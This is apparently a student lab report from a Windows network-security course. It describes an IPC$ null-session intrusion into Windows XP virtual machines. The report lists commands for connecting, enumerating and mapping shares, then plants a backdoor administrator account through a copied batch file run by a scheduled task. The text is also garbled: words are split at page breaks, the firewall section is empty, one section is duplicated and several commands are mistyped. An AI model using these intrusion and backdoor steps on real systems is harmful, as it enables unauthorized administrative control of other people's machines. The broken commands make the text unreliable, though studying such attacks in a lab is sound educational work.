网络安全实例.docx

1、网络安全实例某某学院实习报告实践环节名称： 网络安全与病毒防范学 院：某某学院专 业、班 级： 指 导教 师： 学 生姓 名： 学 号： 2010年5月 20日一、 实习目的1 剖析常见网络协议、操作系统与应用程序漏洞，分析黑客入侵的思路和方法，实践防止黑客网络攻击的基本手段。2 了解防火墙的基本原理和防火墙的主要技术，掌握防火墙的配置和使用方法。3 掌握常见的网络安全技术，学习数据加密的原理。4 提高学生的网络安全意识和病毒防范水平二、 实习时间2010.5.162010.5.20三、 实习地点网络实验室四、 实习内容：1关于IPC$漏洞IPC$是共享“命名管道”的资源，他是为了让进程间通信

2、而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是Windows NT/2000的一种新功能，可在同一时间内，两个IP之间只允许建立一个连接。Windows NT/2000在提供了IPC$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享和系统目录winnt和windows(admin$)共享。IPC$漏洞。其实IPC$本身并不是一个真正意义上的漏洞，其主要漏洞在于其允许空会话，空会话是在没有信任的情况下与服务器建立的会话。对于Windows NT系列的操作系统。在默认安全设置下，借助空连接

3、可以列举目录主机上的用户和共享，访问everyone 2000作用更小,因为在Windows 2000和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表，而且实现起来也不方便，需要借助工具。从以上描述来看空会话好像没有多大用处，但从一次完整的IPC$入侵来看，空会话是一个不可缺少的跳板，一些具体命令如下首先建立一个空会话，命令：net use ipc$“”/user“” 空会话建立之后，可以进行查看远程主机的共享资源。命令：netview ip 查看远程主机的当前时间。命令：net time ip 得到远程主机的NetBIOS用户名列表。命令：nbtstat-A ip通过以上对IPC

4、$DE 学习成功建立IPC$入侵windowsXP ，测试环境：主机（windowsXP sp3）与wndows XP sp2虚拟机) 通过IPC$与windowsXP建立连接，在现在的绝大多数的XP操作系统中总是会出现问题。以下如何解决在建立IPC$出现的一系列问题。IPC$(Internet process connection),通常很多的机子的默认共享都是打开的！在cmd下使用net share命令是不是发现有很多$，“ipc$ admin$ ，c$ ，d$.”，现在进入正题： use 目标IPipc$在实验过程中出现了出现“53错误”，后请教老师后，原来目标主机打开了系统防火墙或者其

5、他防火墙软件。解决方法：计算机上的杀毒软件退出，服务禁止，防止杀毒软件将部分工具作为恶意代码进行删除。服务禁止办法，在控制面板-管理工具-服务，打开服务，看到杀毒软件相关服务项，点属性，选择常规，将正在启用的服务先停止，后选择启动类型，选择禁用。出现1326错误：1）net use 目标IPipc$ /user:administrator进行连接，报告系统发生1326错误，登陆失败：未知用户名或密码错误。检查一下我们的命令是否错误或者用户名错误。结果发现无错。2）在远程机的控制面板-文件夹选项-查看-简单的文件共享,去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接，

6、是无法访问IPC$等管理共享的.结果发现时这个错误，纠正。紧接着可能出现1327错误：登陆失败：用户帐户限制。可能的原因包括不允许空密码，登陆时间限制，或强制的策略限。在远程机的控制面板管理工具本地安全策略安全选项用户权限指派里，禁用空密码用户只能进行控制台登陆. 映射对方默认共享c盘：net use z: 目标IPc$ 实习总结建立ipc$告一段落，删除ipc$连接：net sue 目标IPipc$ /del在次基础上在目标电脑上留下后门账号：编写一个批处理文件，并拷贝到对方的电脑上，然后增加计划任务执行批处理文件；批处理命令：（保存为adduser.bat）net user nebulas

7、test 123456 /add/增加用户nebulastest，密码123456 net localgroup administrators nebulastest /add /为用户nebulastest赋予管理员权限，然后在本机上执行命令（已经建立IPC$连接）：copy adduser.bat 目标IPc$，接着查看目标电脑时间:net time 目标IP，随后为目标电脑增加计划任务：at 目标IP 执行时间 c:adduser.bat在完成以上工作后删除当前IPC$链接，使用新用户和新密码建立IPC$链接，以测试时候建立账号成功。net use 目标IPipc$ 123456 /us

8、er:nebulastest2防火墙的配置防火墙是一种高级访问控制设备，是在被保护网和外网之间执行访问控制策略的一种或一系列不见得组合，是不同网络安全域间通信流的通道，能根据企业有关安全策略控制进出网络的访问行为。在实习中我们做了以下实验3 windows中的加密技术应用 （Office组件中的数字签名、加密）开始- 程序- microsoft office - microsft office 工具 - vba项目的数字证书命令，打开创建数字证书对话框- 输入证书名称并确定。 3 windows中的加密技术应用 （Office组件中的数字签名、加密）开始- 程序- microsoft office - microsft office 工具 - vba项目的数字证书命令，打开创建数字证书对话框- 输入证书名称并确定。五 实习总结为期一周的实训，我意识到了网络安全的重要性和掌握防范水平的必要性。单单熟悉基本网络安全理论知识是不够的，还要从实际出发。只有在实践中才能了解其可行性。在实训过程中，可以说是困难重重。刚开始时，做的准备工作就花了六个课时，建局域网，装虚拟机。哪怕是一个小小的细节疏忽，都会使实验功亏一篑。当然，在老师的帮助下和同学的合作下，我们终于跨过了一个个障碍。发现问题，解决问题，在解决问题中发现问题。 （注：可编辑下载，若有不当之处，请指正，谢谢!）